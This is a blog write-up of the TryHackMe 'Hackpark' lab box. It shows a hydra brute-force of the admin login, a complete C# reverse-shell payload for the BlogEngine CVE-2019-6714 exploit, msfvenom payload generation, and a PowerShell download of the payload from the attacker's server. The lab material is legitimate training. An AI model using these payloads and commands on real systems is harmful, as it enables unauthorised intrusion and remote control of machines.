How I Solved the Hackpark Walkthrough (TryHackMe)

How I Solved the Hackpark Walkthrough (TryHackMe)

CHALLENGE OVERVIEW

• Link: hackpark
• Difficulty: Medium
• Target: user and root flags on a windows machine
• Highlight: using metasploit to quickly and easily gain root access 
• Tools: nmap, dirb, hydra, burpsuite, msfvenom
• Tags: RCE (remote code execution), Windows

BACKGROUND

In this box, we will hack into a windows machine using standard pen-testing tools. There are two options for solving the box.

I’ll demonstrate in this post how to hack into the box with metasploit. In the upcoming Hackpark Part II post, I’ll show how to find the flags without using metasploit.

ATTACK MAP

IPs

First, let’s record our IP addresses in export format to use as bash variables.

export myIP=10.6.2.23
export targetIP=10.10.72.99

ENUMERATION

We’ll kick things off with a dirb scan and an nmap scan.

/admin is discovered on targetIP with dirb.

┌─[kalisurfer@parrot]─[~]
└──╼ $nmap 10.10.208.243
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 16:03 EST
Nmap scan report for 10.10.208.243
Host is up (0.098s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT 	STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

The ms-wbt-server looks interesting. A quick google search shows that this port is used for windows remote desktop. We may come back to this later on in the hack.

PREPPING OUR COMMAND FOR HYDRA

Next, we’ll use firefox in developer mode to inspect the POST request when we attempt to login to the /admin portal with generic credentials (admin:pass).

__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&ctl00%24MainContent%24LoginUser%24UserName=user&ctl00%24MainContent%24LoginUser%24Password=pass&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&ctl00%24MainContent%24LoginUser%24UserName=user&ctl00%24MainContent%24LoginUser%24Password=pass&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in

Next, we’ll prepare our command for hydra to use to brute-force our way into the admin portal.

hydra -l admin -P /home/kalisurfer/hacking-tools/rockyou.txt 10.10.72.99 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

• -l is for username
• -P is for password wordlist 
• http-post-form specifies the type of TCP request
• :Login failed (at the end of the command) specifies the message response after a failed login attempt

Results:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-08 18:02:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.208.243:80/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 663.00 tries/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 active
[80][http-post-form] host: 10.10.208.243   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-08 18:03:43

INITIAL FOOTHOLD

Now we can log in with the user:password combo admin:1qaz2wsx

We are shown an admin dashboard. Searching up blogengine in exploits-db.com reveals a possible exploit for us to use: (CVE-2019-6714).

To use the exploit, we need to upload the exploit’s payload (PostView.ascx) through the file manager. We can then trigger it by accessing the following address in our browser:

http://10.10.172.59/?theme=../../App_Data/files

And we should then be able to catch the revshell with a netcat listener.

PREPARE THE PAYLOAD

We need to change the IP and ports (in bold below) in the following payload, and then save it as PostView.ascx

payload:
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
	static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
   	 base.OnLoad(e);

	using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.6.2.23", 8888)) {
  	  using(System.IO.Stream stream = client.GetStream()) {
  		  using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
  			  streamWriter = new System.IO.StreamWriter(stream);
  					 
  			  StringBuilder strInput = new StringBuilder();

  			  System.Diagnostics.Process p = new System.Diagnostics.Process();
  			  p.StartInfo.FileName = "cmd.exe";
  			  p.StartInfo.CreateNoWindow = true;
  			  p.StartInfo.UseShellExecute = false;
  			  p.StartInfo.RedirectStandardOutput = true;
  			  p.StartInfo.RedirectStandardInput = true;
  			  p.StartInfo.RedirectStandardError = true;
  			  p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
  			  p.Start();
  			  p.BeginOutputReadLine();

  			  while(true) {
  				  strInput.Append(rdr.ReadLine());
  				  p.StandardInput.WriteLine(strInput);
  				  strInput.Remove(0, strInput.Length);
  			  }
  		  }
  	  }
  	  }
    }

    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
       StringBuilder strOutput = new StringBuilder();

     	  if (!String.IsNullOrEmpty(outLine.Data)) {
     		  try {
      			  strOutput.Append(outLine.Data);
          			  streamWriter.WriteLine(strOutput);
          			  streamWriter.Flush();
       		 } catch (Exception err) { }
   	 }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

SET UP THE NC LISTENER

Next, let’s spin up a netcat listener with the command:

nc -lnvp 8888

TRIGGER THE REV SHELL

Now that our malicious payload is uploaded and our netcat listener is activated, all we have to do is navigate to the following address, and we should catch the reverse shell as planned. 

http://10.10.172.59/?theme=../../App_Data/files

And … bingo! We’ve caught the revshell and we are in with our initial foothold!

UPGRADE THE SHELL TO METERPRETER

Now that we are in the shell, we can work to upgrade our shell to a meterpreter shell. This will allow us to use many powerful tools within metasploit framework.

We’ll use python3 to spin up a simple HTTP server that can help us serve the reverse meterpreter shell payload file to the windows machine. 

USE MSFVENOM TO CREATE REVSHELL PAYLOAD

The following command will create the payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe

The payload did not work on my machine, so I added encoding using a standard encoder, the “shikata gai nai”. 

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe

TRANSFER THE MSFVENOM PAYLOAD TO TARGET

Next, we’ll transfer the encoded payload from our attack machine to the target machine. 

Let’s navigate to the directory that holds the payload.exe on our attack machine. Then we’ll spin up a simple HTTP server using the command:

Python3 -m http.server

Then we’ll grab the file and copy it to our target Windows machine from the HTTP server:

powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Windows\Temp\winPEASx64.exe'"

Notice that we save the file in the Temp directory because we have to write permissions there. This is a common configuration that can be leveraged as an unprivileged user.

CATCH THE METERPRETER SHELL WITH METASPLOIT

First, let’s fire up Metasploit console:

msfconsole

Then load the handler:

use exploit/multi/handler

Next, we need to set the lport, lhost, and set the payload to windows/meterpreter/reverse_tcp

Now that everything is set up correctly, we can run it to boot up the meterpreter listener:

Run

activate the shell.exe on the target machine to throw a meterpreter revshell

And we got it! The lower left console window shows the meterpreter shell.

Now that we are running a meterpreter shell in msfconsole we can quickly pwn the system with:

getsystem

And view the system information:

sysinfo

We can view our user information with the command:

getuid

Since we are already NT Authority, thanks to the magical powers of Metasploit, we don’t need to do anything else except locate and retrieve the two flags.

We found both flags!

In the next post, I’ll walk you through an alternate solution to this box without needing Metasploit.